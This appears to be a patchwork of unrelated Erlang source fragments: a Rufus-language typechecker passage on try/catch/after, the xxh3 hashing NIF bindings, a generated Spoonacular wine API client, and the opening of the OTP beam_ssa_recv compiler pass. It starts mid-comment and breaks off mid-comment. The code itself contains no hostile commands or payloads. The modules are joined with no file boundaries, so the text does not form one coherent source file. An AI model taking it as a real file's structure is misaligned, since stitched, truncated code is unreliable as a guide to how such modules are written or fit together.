%%   form is annotated with type information.
%% - `{error, mismatched_try_catch_return_types, Data}` is thrown if the try and
%%   catch blocks have return values with different types.
-spec typecheck_and_annotate_try_catch_after(
    rufus_stack(),
    globals(),
    locals(),
    try_catch_after_form()
) -> {ok, locals(), try_catch_after_form()} | no_return().
typecheck_and_annotate_try_catch_after(
    Stack,
    Globals,
    Locals,
    {try_catch_after,
        Context = #{
            try_exprs := TryExprs,
            catch_clauses := CatchClauses,
            after_exprs := AfterExprs
        }}
) ->
    %% Bindings made inside the try block (_NewLocals1) are discarded — they
    %% must not leak into the surrounding scope.
    {ok, _NewLocals1, AnnotatedTryExprs} = typecheck_and_annotate(
        [],
        Stack,
        Globals,
        Locals,
        TryExprs
    ),
    %% Catch clauses see the partially annotated form on the stack. Each
    %% clause is typechecked independently with the original Locals, so
    %% bindings don't leak between clauses.
    AnnotatedForm1 = {try_catch_after, Context#{try_exprs => AnnotatedTryExprs}},
    TryCatchAfterStack = [AnnotatedForm1 | Stack],
    AnnotatedCatchClauses = lists:map(
        fun(CatchClause) ->
            {ok, _, [AnnotatedCatchClause]} = typecheck_and_annotate(
                [],
                TryCatchAfterStack,
                Globals,
                Locals,
                [CatchClause]
            ),
            AnnotatedCatchClause
        end,
        CatchClauses
    ),
    %% The after block is typechecked with the original stack and locals; its
    %% bindings are discarded as well.
    {ok, _NewLocals2, AnnotatedAfterExprs} = typecheck_and_annotate(
        [],
        Stack,
        Globals,
        Locals,
        AfterExprs
    ),
    %% The try block and all catch clauses must agree on a return type
    %% (throwing blocks are exempt).
    ok = typecheck_try_catch_return_types(AnnotatedTryExprs, AnnotatedCatchClauses),
    AnnotatedForm2 =
        {try_catch_after, Context#{
            try_exprs => AnnotatedTryExprs,
            catch_clauses => AnnotatedCatchClauses,
            after_exprs => AnnotatedAfterExprs
        }},
    case rufus_type:resolve(Stack, Globals, AnnotatedForm2) of
        {ok, TypeForm} ->
            AnnotatedForm3 =
                {try_catch_after, Context#{
                    try_exprs => AnnotatedTryExprs,
                    catch_clauses => AnnotatedCatchClauses,
                    after_exprs => AnnotatedAfterExprs,
                    type => TypeForm
                }},
            %% The original Locals are returned unchanged: nothing bound in
            %% the try/catch/after blocks escapes.
            {ok, Locals, AnnotatedForm3};
        Error ->
            throw(Error)
    end.
%% typecheck_try_catch_return_types ensures that the try block and all catch
%% blocks have the same return type. Only the last expression of the try block
%% determines its return type, and any block whose type kind is `throw` never
%% returns and is exempt from the check. Returns ok on success; otherwise an
%% {error, mismatched_try_catch_return_type, Data} triple is thrown by
%% validate_try_catch_return_type/2.
-spec typecheck_try_catch_return_types(
    rufus_forms(),
    list(catch_clause_form())
) -> ok | no_return().
typecheck_try_catch_return_types(TryExprs, CatchClauses) ->
    LastTryExpr = lists:last(TryExprs),
    %% Catch clause pairs come first and the try block's final expression
    %% last, so the first non-throwing catch clause determines the expected
    %% return type.
    AllPairs =
        [{CatchClauseForm, rufus_form:type(CatchClauseForm)} || CatchClauseForm <- CatchClauses] ++
            [{LastTryExpr, rufus_form:type(LastTryExpr)}],
    %% Drop pairs whose type kind is `throw`; they never return.
    FormPairs = lists:filter(
        fun
            ({_Form, {type, #{kind := throw}}}) -> false;
            (_Pair) -> true
        end,
        AllPairs
    ),
    validate_try_catch_return_type([], FormPairs).
%% validate_try_catch_return_type iterates over {Form, TypeForm} 2-tuples and
%% returns ok if the types of all pairs match, or throws an {error,
%% mismatched_try_catch_return_type, Data} 3-tuple. The first argument is an
%% accumulator: [] until the first pair is seen, then a single-element list
%% holding the type spec that every remaining pair must match.
%% -spec validate_try_catch_return_type(list(atom()), list({rufus_form(), type_form()})) ->
%%     ok | no_return().
validate_try_catch_return_type([Spec], [{_Form, {type, #{spec := Spec}}} | T]) ->
    %% The pair's type spec matches the expected one; keep going.
    validate_try_catch_return_type([Spec], T);
validate_try_catch_return_type([], [{_Form, {type, #{spec := Spec}}} | T]) ->
    %% First pair seen: its type spec becomes the expected one.
    validate_try_catch_return_type([Spec], T);
validate_try_catch_return_type([ExpectedSpec], [{Form, {type, #{spec := ActualSpec}}} | _T]) ->
    %% Mismatch: report the offending form with expected/actual specs.
    Data = #{
        form => Form,
        actual => ActualSpec,
        expected => ExpectedSpec
    },
    throw({error, mismatched_try_catch_return_type, Data});
validate_try_catch_return_type(_, []) ->
    ok.
%% typecheck_and_annotate_catch_clause typechecks and annotates the match
%% expression and body expressions of a catch block. Return values:
%% - `{ok, AnnotatedForm}` if no issues are found. The catch_clause form is
%%   annotated with type information.
%% - An error is thrown if `rufus_type:resolve/3` returns an error.
-spec typecheck_and_annotate_catch_clause(
    rufus_stack(),
    globals(),
    locals(),
    catch_clause_form()
) -> {ok, catch_clause_form()} | no_return().
typecheck_and_annotate_catch_clause(
    Stack,
    Globals,
    Locals,
    Form = {catch_clause, Context = #{match_expr := MatchExpr, exprs := Exprs}}
) ->
    %% The clause's match expression is typechecked with the clause itself at
    %% the head of the stack; identifiers it binds are visible to the body.
    {ok, NewLocals, [AnnotatedMatchExpr]} = typecheck_and_annotate(
        [],
        [Form | Stack],
        Globals,
        Locals,
        [MatchExpr]
    ),
    {ok, _, AnnotatedExprs} = typecheck_and_annotate([], Stack, Globals, NewLocals, Exprs),
    AnnotatedContext = Context#{
        match_expr => AnnotatedMatchExpr,
        exprs => AnnotatedExprs
    },
    case rufus_type:resolve(Stack, Globals, {catch_clause, AnnotatedContext}) of
        {ok, TypeForm} ->
            {ok, {catch_clause, AnnotatedContext#{type => TypeForm}}};
        Error ->
            throw(Error)
    end.
%% scope helpers

%% annotate_locals stores the local scope in a form's context under the
%% `locals` key, replacing any existing value.
-spec annotate_locals(locals(), rufus_form()) -> {ok, rufus_form()}.
annotate_locals(Locals, {FormType, Context}) ->
    AnnotatedContext = Context#{locals => Locals},
    {ok, {FormType, AnnotatedContext}}.
%% push_local adds a form to the local scope, mapping its spec to a
%% single-element list holding its type form. Anonymous variables ('_') in
%% identifier and param forms are ignored.
-spec push_local(locals(), rufus_form()) -> {ok, locals()}.
push_local(Locals, {FormType, #{spec := '_'}}) when
    FormType =:= identifier; FormType =:= param
->
    {ok, Locals};
push_local(Locals, {_FormType, #{spec := Spec, type := Type}}) ->
    {ok, Locals#{Spec => [Type]}}.
%%%-------------------------------------------------------------------
%% @doc NIF bindings for XXH3 hash functions implemented in Rust
%%
%% XXH3 is a new speed-optimized hash algorithm of the xxHash family
%% of non-cryptographic hash functions, featuring:
%% <ul>
%% <li>Improved speed for both small and large inputs</li>
%% <li>True 64-bit and 128-bit outputs</li>
%% <li>SIMD acceleration</li>
%% <li>Improved 32-bit viability</li>
%% </ul>
%%
%% Speed analysis methodology is explained here:
%%
%% https://fastcompression.blogspot.com/2019/03/presenting-xxh3.html
%%
%% @end
%%%-------------------------------------------------------------------
-module(xxh3).
-export([
new/0, new/1,
new_with_secret/1,
update/2,
reset/1,
digest/1,
hash64/1, hash64/2,
hash64_with_secret/2,
hash128/1, hash128/2,
hash128_with_secret/2
]).
-include("crates.hrl").
-opaque xxh3_ref() :: reference().
-export_type([xxh3_ref/0]).
-define(not_loaded, not_loaded(?LINE)).
-on_load(init/0).
%% Loads the native NIF library; invoked automatically via the -on_load
%% attribute when this module is loaded.
init() ->
    ?load_nif_from_crate(xxh3, ?crate_xxh3, 0).
%% The functions below are NIF stubs: init/0 replaces them with the native
%% implementations at load time, and calling one before the library has been
%% loaded raises a `not_loaded` error (see not_loaded/1).

%% @doc Creates a new 64-bit hasher with default secret.
%%
%% You can stream data to the returned object using {@link update/2},
%% and calculate intermediate hash values using {@link digest/1}.
-spec new() -> xxh3_ref().
new() ->
    ?not_loaded.

%% @doc Creates a new 64-bit hasher with the given `Seed'.
-spec new(non_neg_integer()) -> xxh3_ref().
new(_Seed) ->
    ?not_loaded.

%% @doc Creates a new 64-bit hasher with the given `Secret'.
%%
%% `Secret' must be a binary of size 192 bytes.
-spec new_with_secret(binary()) -> xxh3_ref().
new_with_secret(_Secret) ->
    ?not_loaded.

%% @doc Updates hasher state with the given chunk of data.
-spec update(xxh3_ref(), binary()) -> ok.
update(_Resource, _Data) ->
    ?not_loaded.

%% @doc Resets hasher state.
-spec reset(xxh3_ref()) -> ok.
reset(_Resource) ->
    ?not_loaded.

%% @doc Computes hash for streamed data.
-spec digest(xxh3_ref()) -> non_neg_integer().
digest(_Resource) ->
    ?not_loaded.

%% @doc Returns 64-bit hash for the given `Data'.
%%
%% This is default 64-bit variant, using default secret and default seed of 0.
%% It's the fastest variant.
-spec hash64(binary()) -> non_neg_integer().
hash64(_Data) ->
    ?not_loaded.

%% @doc Returns 64-bit hash for the given `Data' with `Seed' value.
%%
%% This variant generates a custom secret on the fly
%% based on default secret altered using the `Seed' value.
%% While this operation is decently fast, note that it's not completely free.
-spec hash64(binary(), non_neg_integer()) -> non_neg_integer().
hash64(_Data, _Seed) ->
    ?not_loaded.

%% @doc Returns 64-bit hash for the given `Data' with a custom `Secret'.
%%
%% It's possible to provide any binary as a "secret" to generate the hash.
%% This makes it more difficult for an external actor to prepare an intentional collision.
%% The main condition is that `Secret' size *must* be large enough (>= 136 bytes).
%% However, the quality of produced hash values depends on secret's entropy.
%% Technically, the secret must look like a bunch of random bytes.
%% Avoid "trivial" or structured data such as repeated sequences or a text document.
-spec hash64_with_secret(binary(), binary()) -> non_neg_integer().
hash64_with_secret(_Data, _Secret) ->
    ?not_loaded.
%% @doc Returns 128-bit hash for the given `Data'.
%%
%% This is default 128-bit variant, using default secret and default seed of 0.
-spec hash128(binary()) -> non_neg_integer().
hash128(Data) ->
    hash128(Data, 0).

%% @doc Returns 128-bit hash for the given `Data' with `Seed' value.
%%
%% See {@link hash64/2} for more details.
-spec hash128(binary(), non_neg_integer()) -> non_neg_integer().
hash128(Data, Seed) ->
    %% The NIF returns the raw 128-bit hash as a big-endian binary.
    HashBin = hash128_with_seed_bin(Data, Seed),
    binary:decode_unsigned(HashBin).

%% @doc Returns 128-bit hash for the given `Data' with a custom `Secret'.
%%
%% See {@link hash64_with_secret/2} for more details.
-spec hash128_with_secret(binary(), binary()) -> non_neg_integer().
hash128_with_secret(Data, Secret) ->
    HashBin = hash128_with_secret_bin(Data, Secret),
    binary:decode_unsigned(HashBin).
%%%-------------------------------------------------------------------
%% Internal functions
%%%-------------------------------------------------------------------

%% NIF stub; the native version returns the raw 128-bit hash as a binary
%% (decoded to an integer by hash128/1,2).
hash128_with_seed_bin(_Data, _Seed) ->
    ?not_loaded.

%% NIF stub; see hash128_with_secret/2.
hash128_with_secret_bin(_Data, _Secret) ->
    ?not_loaded.

%% Raises a descriptive error when a NIF stub is called before the native
%% library has been loaded by init/0.
not_loaded(Line) ->
    erlang:nif_error({not_loaded, [{module, ?MODULE}, {line, Line}]}).
-module(spoonacular_wine_api).
-export([get_dish_pairing_for_wine/2, get_dish_pairing_for_wine/3,
get_wine_description/2, get_wine_description/3,
get_wine_pairing/2, get_wine_pairing/3,
get_wine_recommendation/2, get_wine_recommendation/3]).
-define(BASE_URL, "").
%% @doc Dish Pairing for Wine
%% Find a dish that goes well with a given wine.
-spec get_dish_pairing_for_wine(ctx:ctx(), binary()) -> {ok, spoonacular_inline_response_200_44:spoonacular_inline_response_200_44(), spoonacular_utils:response_info()} | {ok, hackney:client_ref()} | {error, term(), spoonacular_utils:response_info()}.
get_dish_pairing_for_wine(Ctx, Wine) ->
    get_dish_pairing_for_wine(Ctx, Wine, #{}).

-spec get_dish_pairing_for_wine(ctx:ctx(), binary(), maps:map()) -> {ok, spoonacular_inline_response_200_44:spoonacular_inline_response_200_44(), spoonacular_utils:response_info()} | {ok, hackney:client_ref()} | {error, term(), spoonacular_utils:response_info()}.
get_dish_pairing_for_wine(Ctx, Wine, Optional) ->
    Params = maps:get(params, Optional, #{}),
    %% NOTE(review): the fallback reads the `kuberl` application environment,
    %% not this application's — looks like generated-template residue; confirm.
    Cfg = maps:get(cfg, Optional, application:get_env(kuberl, config, #{})),
    HackneyOpts = maps:get(hackney_opts, Optional, []),
    Path = ["/food/wine/dishes"],
    QS = [{<<"wine">>, Wine}] ++ spoonacular_utils:optional_params([], Params),
    Headers = spoonacular_utils:select_header_content_type([]),
    spoonacular_utils:request(Ctx, get, [?BASE_URL, Path], QS, Headers, [], HackneyOpts, Cfg).
%% @doc Wine Description
%% Get a simple description of a certain wine, e.g. \"malbec\", \"riesling\", or \"merlot\".
-spec get_wine_description(ctx:ctx(), binary()) -> {ok, spoonacular_inline_response_200_46:spoonacular_inline_response_200_46(), spoonacular_utils:response_info()} | {ok, hackney:client_ref()} | {error, term(), spoonacular_utils:response_info()}.
get_wine_description(Ctx, Wine) ->
    get_wine_description(Ctx, Wine, #{}).

-spec get_wine_description(ctx:ctx(), binary(), maps:map()) -> {ok, spoonacular_inline_response_200_46:spoonacular_inline_response_200_46(), spoonacular_utils:response_info()} | {ok, hackney:client_ref()} | {error, term(), spoonacular_utils:response_info()}.
get_wine_description(Ctx, Wine, Optional) ->
    Params = maps:get(params, Optional, #{}),
    %% NOTE(review): env fallback reads the `kuberl` app env — confirm.
    Cfg = maps:get(cfg, Optional, application:get_env(kuberl, config, #{})),
    HackneyOpts = maps:get(hackney_opts, Optional, []),
    Path = ["/food/wine/description"],
    QS = [{<<"wine">>, Wine}] ++ spoonacular_utils:optional_params([], Params),
    Headers = spoonacular_utils:select_header_content_type([]),
    spoonacular_utils:request(Ctx, get, [?BASE_URL, Path], QS, Headers, [], HackneyOpts, Cfg).
%% @doc Wine Pairing
%% Find a wine that goes well with a food. Food can be a dish name (\"steak\"), an ingredient name (\"salmon\"), or a cuisine (\"italian\").
-spec get_wine_pairing(ctx:ctx(), binary()) -> {ok, spoonacular_inline_response_200_45:spoonacular_inline_response_200_45(), spoonacular_utils:response_info()} | {ok, hackney:client_ref()} | {error, term(), spoonacular_utils:response_info()}.
get_wine_pairing(Ctx, Food) ->
    get_wine_pairing(Ctx, Food, #{}).

-spec get_wine_pairing(ctx:ctx(), binary(), maps:map()) -> {ok, spoonacular_inline_response_200_45:spoonacular_inline_response_200_45(), spoonacular_utils:response_info()} | {ok, hackney:client_ref()} | {error, term(), spoonacular_utils:response_info()}.
get_wine_pairing(Ctx, Food, Optional) ->
    Params = maps:get(params, Optional, #{}),
    %% NOTE(review): env fallback reads the `kuberl` app env — confirm.
    Cfg = maps:get(cfg, Optional, application:get_env(kuberl, config, #{})),
    HackneyOpts = maps:get(hackney_opts, Optional, []),
    Path = ["/food/wine/pairing"],
    %% 'maxPrice' is the only optional query parameter for this endpoint.
    QS = [{<<"food">>, Food}] ++ spoonacular_utils:optional_params(['maxPrice'], Params),
    Headers = spoonacular_utils:select_header_content_type([]),
    spoonacular_utils:request(Ctx, get, [?BASE_URL, Path], QS, Headers, [], HackneyOpts, Cfg).
%% @doc Wine Recommendation
%% Get a specific wine recommendation (concrete product) for a given wine type, e.g. \"merlot\".
-spec get_wine_recommendation(ctx:ctx(), binary()) -> {ok, spoonacular_inline_response_200_47:spoonacular_inline_response_200_47(), spoonacular_utils:response_info()} | {ok, hackney:client_ref()} | {error, term(), spoonacular_utils:response_info()}.
get_wine_recommendation(Ctx, Wine) ->
    get_wine_recommendation(Ctx, Wine, #{}).

-spec get_wine_recommendation(ctx:ctx(), binary(), maps:map()) -> {ok, spoonacular_inline_response_200_47:spoonacular_inline_response_200_47(), spoonacular_utils:response_info()} | {ok, hackney:client_ref()} | {error, term(), spoonacular_utils:response_info()}.
get_wine_recommendation(Ctx, Wine, Optional) ->
    Params = maps:get(params, Optional, #{}),
    %% NOTE(review): env fallback reads the `kuberl` app env — confirm.
    Cfg = maps:get(cfg, Optional, application:get_env(kuberl, config, #{})),
    HackneyOpts = maps:get(hackney_opts, Optional, []),
    Path = ["/food/wine/recommendation"],
    QS =
        [{<<"wine">>, Wine}] ++
            spoonacular_utils:optional_params(['maxPrice', 'minRating', 'number'], Params),
    Headers = spoonacular_utils:select_header_content_type([]),
    spoonacular_utils:request(Ctx, get, [?BASE_URL, Path], QS, Headers, [], HackneyOpts, Cfg).
%%
%% %CopyrightBegin%
%%
%% Copyright Ericsson AB 2018-2021. All Rights Reserved.
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% %CopyrightEnd%
%%
-module(beam_ssa_recv).
-export([format_error/1, module/2]).
%%%
%%% In code such as:
%%%
%%% Ref = make_ref(), %Or erlang:monitor(process, Pid)
%%% .
%%% .
%%% .
%%% receive
%%% {Ref,Reply} -> Reply
%%% end.
%%%
%%% we know that none of the messages that exist in the message queue
%%% before the call to make_ref/0 can be matched out in the receive
%%% statement. Therefore we can avoid going through the entire message
%%% queue if we introduce four new instructions (here written as BIFs
%%% in pseudo-Erlang):
%%%
%%% OpaqueMarker = 'reserve_marker'(),
%%% Ref = make_ref(),
%%% 'bind_marker'(OpaqueMarker, Ref),
%%% .
%%% .
%%% .
%%% 'use_marker'(Ref),
%%% receive
%%% {Ref,Reply} ->
%%% 'clear_marker'(Ref),
%%% Reply
%%% end.
%%%
%%% The reserve_marker/0 instruction returns an opaque term representing the
%%% current message queue position (this is never visible to the end user).
%%%
%%% To use a marker it must first be bound to a term using bind_marker/2. This
%%% essentially renames the marker and all subsequent operations will use the
%%% bound term instead.
%%%
%%% Having separate "reserve" and "bind" steps may seem verbose but is
%%% necessary to avoid races in monitor/2 and friends: if the marker is not
%%% created before the call, we may get a 'DOWN' message after monitor/2
%%% returns but before the marker is created.
%%%
%%% The use_marker/1 instruction is used before suitable receive loops to start
%%% the search at the previously saved position.
%%%
%%% When the marker is no longer needed we can use clear_marker/1 to remove
%%% it. This is not strictly required as the number of active markers are
%%% limited and they may be overwritten as new ones are created, but being a
%%% good citizen reduces the risk of overwriting a marker that would otherwise
%%% have been used later on.
%%%
%%% It's important to note that use_marker/1 and clear_marker/1 do nothing when
%%% given anything other than a currently active marker. This lets us apply the
%%% optimization even when a given receive _doesn't always_ have a suitable
%%% reference to work with, for example:
%%%
%%% first_function(Pid, Foo) ->
%%% OpaqueMarker = 'reserve_marker'(),
%%% Ref = make_ref(),
%%% 'bind_marker'(OpaqueMarker, Ref),
%%% Pid ! {self(), Ref, Foo},
%%% await_result(Ref).
%%%
%%% second_function(Pid, Foo) ->
%%% {Bar, Tag} = foo:bar(Foo),
%%% Pid ! {self(), Tag, Bar},
%%% await_result(Tag).
%%%
%%% await_result(Tag) ->
%%% 'use_marker'(Tag),
%%% receive
%%% {Tag, Result} -> Result
%%% end.
%%%
%%% Because use_marker/1 ignores terms that haven't been bound to a marker, the
%%% optimization is applied when await_result/1 is reached through
%%% first_function/2, but not second_function/2. If these instructions required
%%% markers (active or not) we would have to disable the optimization in cases
%%% like this.
%%%
-include("beam_ssa.hrl").
-import(lists, [foldl/3, search/2]).
%% Psuedo-block for representing function returns in the block graph. Body
%% calls add an edge returning _from_ this block.
-define(RETURN_BLOCK, -1).
-define(ENTRY_BLOCK, 0).
%% Formats an optimization-info term produced by this pass into a printable
%% string (used for the recv_opt_info diagnostics; see module/2).
-spec format_error(term()) -> nonempty_string().
format_error(OptInfo) ->
    format_opt_info(OptInfo).
%% Accumulated state for the scan pass over the whole module.
-record(scan, { %% Module-wide digraph whose vertices are {FuncId, BlockLabel}
                %% (with ?RETURN_BLOCK standing in for function returns).
                graph=beam_digraph:new(),
                %% Maps each function id to its block map and argument list.
                module :: #{ beam_ssa:b_local() => {beam_ssa:block_map(),
                                                    [beam_ssa:b_var()]} },
                %% peek_message instructions per function, keyed by function
                %% id (see scan_peek_message/1).
                recv_candidates=#{},
                %% NOTE(review): populated later in the pass; presumably the
                %% reference-creating call sites — confirm against plan/1.
                ref_candidates=#{} }).
%% module(Module, Options) -> {ok,Module,Warnings}.
%%  Entry point for the pass: scan the module for receive/reference
%%  candidates, plan where to reserve/use/clear receive markers, and
%%  rewrite the module accordingly.  Warnings are only collected when
%%  the recv_opt_info option is given.
-spec module(Module, Options) -> Result when
      Module :: beam_ssa:b_module(),
      Options :: [compile:option()],
      Result :: {ok, beam_ssa:b_module(), list()}.
module(#b_module{}=Mod0, Opts) ->
    case scan(Mod0) of
        #scan{}=Scan ->
            %% Figure out where to place marker creation, usage, and clearing
            %% by walking through the module-wide graph.
            {Markers, Uses, Clears} = plan(Scan),
            Mod = optimize(Mod0, Markers, Uses, Clears),
            Ws = case proplists:get_bool(recv_opt_info, Opts) of
                     true -> collect_opt_info(Mod);
                     false -> []
                 end,
            {ok, Mod, Ws};
        none ->
            %% No peek_message instructions; just skip it all.
            {ok, Mod0, []}
    end.
%% scan(Module) -> #scan{} | none.
%%  Build the module-wide block graph, or return 'none' when there are
%%  no receives in the module at all.
scan(#b_module{body=Fs}) ->
    %% Quickly collect all peek_message instructions in this module,
    %% allowing us to avoid the expensive building of the module-wide
    %% graph of all blocks if there are no receives in this module.
    case scan_peek_message(Fs) of
        [_|_]=Rs0 ->
            Rs = maps:from_list(Rs0),
            ModMap = foldl(fun(#b_function{bs=Blocks,args=Args}=F, Acc) ->
                               FuncId = get_func_id(F),
                               Acc#{ FuncId => {Blocks, Args} }
                           end, #{}, Fs),
            foldl(fun(F, Scan0) ->
                          FuncId = get_func_id(F),
                          Scan = scan_add_vertex({FuncId, ?ENTRY_BLOCK}, Scan0),
                          scan_function(FuncId, F, Scan)
                  end,
                  #scan{ module = ModMap, recv_candidates = Rs }, Fs);
        [] ->
            none
    end.
%% scan_peek_message(Functions) -> [{FuncId,[{Lbl,Instruction}]}].
%%  Collect, per function, every block that begins with a peek_message
%%  instruction (the entry of a receive loop).
scan_peek_message([#b_function{bs=Bs}=F | Fs]) ->
    case scan_peek_message_bs(maps:to_list(Bs)) of
        [] ->
            scan_peek_message(Fs);
        [_ | _] = Rs ->
            FuncId = get_func_id(F),
            [{FuncId, Rs} | scan_peek_message(Fs)]
    end;
scan_peek_message([]) ->
    [].
scan_peek_message_bs([{Lbl, Blk} | Bs]) ->
    case Blk of
        #b_blk{is=[#b_set{op=peek_message}=I | _]} ->
            %% peek_message is always the first instruction of its block.
            [{Lbl, I} | scan_peek_message_bs(Bs)];
        #b_blk{} ->
            scan_peek_message_bs(Bs)
    end;
scan_peek_message_bs([]) ->
    [].
%% get_func_id(Function) -> b_local().
%%  Build the #b_local{} identifier for a function from its func_info
%%  annotation.
get_func_id(#b_function{anno=Anno}) ->
    {_,Name,Arity} = maps:get(func_info, Anno),
    #b_local{name=#b_literal{val=Name},arity=Arity}.
%% scan_function(FuncId, Function, State) -> State.
%%  Add all edges of one function (in reverse postorder) to the
%%  module-wide graph.
scan_function(FuncId, #b_function{bs=Blocks}, State) ->
    scan_bs(beam_ssa:rpo(Blocks), Blocks, FuncId, State).
scan_bs([Lbl | Lbls], Blocks, FuncId, State0) ->
    #b_blk{is=Is} = Blk = map_get(Lbl, Blocks),
    State = scan_is(Is, Blk, Lbl, Blocks, FuncId, State0),
    scan_bs(Lbls, Blocks, FuncId, State);
scan_bs([], _Blocks, _FuncId, State) ->
    State.
%% scan_is(Is, Blk, Lbl, Blocks, FuncId, State) -> State.
%%  Add the out-edges for one block.  Calls get labelled edges carrying
%%  argument/parameter translations; plain branches get 'branch' edges.
scan_is([#b_set{op={succeeded,body}}], Blk, Lbl, _Blocks, FuncId, State) ->
    #b_br{bool=#b_var{},succ=Succ} = Blk#b_blk.last, %Assertion.
    %% Orphaned markers get recycled very quickly so there's little harm in
    %% ignoring exceptions. Clearing specific markers on exceptions requires us
    %% to add try/catch everywhere to clear markers before rethrowing, and that
    %% isn't worth the bother.
    scan_add_edge({FuncId, Lbl}, {FuncId, Succ}, State);
scan_is([#b_set{op=new_try_tag,dst=Dst}], Blk, Lbl, _Blocks, FuncId, State) ->
    %% This never throws but the failure label points at a landingpad, so we'll
    %% ignore that branch.
    #b_br{bool=Dst,succ=Succ} = Blk#b_blk.last, %Assertion.
    scan_add_edge({FuncId, Lbl}, {FuncId, Succ}, State);
scan_is([#b_set{op=call,dst=Dst,args=[#b_remote{} | _]}=Call | Is],
        Blk, Lbl, Blocks, FuncId, State0) ->
    %% Remote calls may create or use references (see si_remote_call/6).
    case {Is, Blk#b_blk.last} of
        {[], #b_ret{arg=Dst}} ->
            scan_is(Is, Blk, Lbl, Blocks, FuncId, State0);
        {[#b_set{op={succeeded,body}}], #b_br{bool=Bool,succ=Succ}} ->
            #b_var{} = Bool, %Assertion.
            State = si_remote_call(Call, Lbl, Succ, Blocks, FuncId, State0),
            scan_is(Is, Blk, Lbl, Blocks, FuncId, State);
        _ ->
            State = si_remote_call(Call, Lbl, Lbl, Blocks, FuncId, State0),
            scan_is(Is, Blk, Lbl, Blocks, FuncId, State)
    end;
scan_is([#b_set{op=call,dst=Dst,args=[#b_local{}=Callee | Args]}],
        #b_blk{last=#b_ret{arg=Dst}}, Lbl, _Blocks, FuncId, State) ->
    %% Tail call to a local function.
    scan_add_call(tail, Args, Callee, Lbl, FuncId, State);
scan_is([#b_set{op=call,dst=Dst,args=[#b_local{}=Callee | Args]} | Is],
        Blk, Lbl, Blocks, FuncId, State0) ->
    %% Body call to a local function.
    [#b_set{op={succeeded,body},args=[Dst]}] = Is, %Assertion.
    State = scan_add_call(body, Args, Callee, Lbl, FuncId, State0),
    scan_is(Is, Blk, Lbl, Blocks, FuncId, State);
scan_is([_I | Is], Blk, Lbl, Blocks, FuncId, State) ->
    scan_is(Is, Blk, Lbl, Blocks, FuncId, State);
scan_is([], #b_blk{last=#b_ret{}}, Lbl, _Blocks, FuncId, State) ->
    %% Returns are modelled as edges to the ?RETURN_BLOCK pseudo-block.
    scan_add_edge({FuncId, Lbl}, {FuncId, ?RETURN_BLOCK}, State);
scan_is([], Blk, Lbl, _Blocks, FuncId, State) ->
    foldl(fun(Succ, Acc) ->
                  scan_add_edge({FuncId, Lbl}, {FuncId, Succ}, Acc)
          end, State, beam_ssa:successors(Blk)).
%% Adds an edge to the callee, with argument/parameter translation to let us
%% follow specific references.  A body call also gets a return edge from the
%% callee's ?RETURN_BLOCK back to the call site; a tail call does not.
scan_add_call(Kind, Args, Callee, Lbl, Caller, #scan{module=ModMap}=State0) ->
    #{ Callee := {_Blocks, Params} } = ModMap,
    {Translation, Inverse} = scan_translate_call(Args, Params, #{}, #{}),
    State = scan_add_edge({Caller, Lbl},
                          {Callee, ?ENTRY_BLOCK},
                          {Translation, Inverse},
                          State0),
    case Kind of
        body ->
            scan_add_edge({Callee, ?RETURN_BLOCK},
                          {Caller, Lbl},
                          {Inverse, Translation},
                          State);
        tail ->
            State
    end.
%% scan_translate_call(Args, Params, ArgToParams0, ParamToArgs0) ->
%%     {ArgToParams, ParamToArgs}.
%%  Build both directions of the argument/parameter mapping for a call
%%  edge.  Args and Params must have the same length.
scan_translate_call(Args, Params, ArgToParams0, ParamToArgs0) ->
    Pairs = lists:zip(Args, Params),
    lists:foldl(fun({Arg, Param}, {AtoP, PtoA}) ->
                        {AtoP#{ Arg => Param }, PtoA#{ Param => Arg }}
                end, {ArgToParams0, ParamToArgs0}, Pairs).
%% scan_add_edge(From, To, [Label,] State) -> State.
%%  Add a labelled edge (default label 'branch') to the block graph,
%%  creating the endpoint vertices as needed.
scan_add_edge(From, To, State) ->
    scan_add_edge(From, To, branch, State).
scan_add_edge(From, To, Label, State0) ->
    State = scan_add_vertex(To, scan_add_vertex(From, State0)),
    Graph = beam_digraph:add_edge(State#scan.graph, From, To, Label),
    State#scan{graph=Graph}.
%% Add a vertex to the graph unless it is already present.
scan_add_vertex(Vertex, #scan{graph=Graph0}=State) ->
    case beam_digraph:has_vertex(Graph0, Vertex) of
        true ->
            State;
        false ->
            Graph = beam_digraph:add_vertex(Graph0, Vertex),
            State#scan{graph=Graph}
    end.
%% si_remote_call(Call, CalledAt, ValidAfter, Blocks, FuncId, State) -> State.
%%  Record a remote call as a reference-creation candidate (erlang:make_ref
%%  and friends) or a receive candidate (demonitor with 'flush'), as
%%  classified by si_remote_call_1/4.
si_remote_call(#b_set{anno=Anno,dst=Dst,args=Args}=Call,
               CalledAt, ValidAfter, Blocks, FuncId, State) ->
    case si_remote_call_1(Dst, Args, ValidAfter, Blocks) of
        {makes_ref, ExtractedAt, Ref} ->
            #scan{ref_candidates=Candidates0} = State,
            MakeRefs0 = maps:get(FuncId, Candidates0, []),
            MakeRef = {Anno, CalledAt, Dst, ExtractedAt, Ref},
            Candidates = Candidates0#{ FuncId => [MakeRef | MakeRefs0] },
            State#scan{ref_candidates=Candidates};
        uses_ref ->
            #scan{recv_candidates=Candidates0} = State,
            UseRefs0 = maps:get(FuncId, Candidates0, []),
            UseRef = {CalledAt, Call},
            Candidates = Candidates0#{ FuncId => [UseRef | UseRefs0] },
            State#scan{recv_candidates=Candidates};
        no ->
            State
    end.
%% si_remote_call_1(Dst, [Callee|Args], Lbl, Blocks) ->
%%     {makes_ref, ExtractedAt, Ref} | uses_ref | no.
%%  Classify a remote call: does it create a reference that could be
%%  bound to a marker, or does it consume one?
si_remote_call_1(Dst, [Callee | Args], Lbl, Blocks) ->
    MFA = case Callee of
              #b_remote{mod=#b_literal{val=Mod},
                        name=#b_literal{val=Func},
                        arity=Arity} ->
                  {Mod, Func, Arity};
              _ ->
                  none
          end,
    case MFA of
        {erlang,alias,A} when 0 =< A, A =< 1 ->
            {makes_ref, Lbl, Dst};
        {erlang,demonitor,2} ->
            case Args of
                [_MRef, #b_literal{val=[flush]}] ->
                    %% If the monitor fired prior to this call, 'flush' will
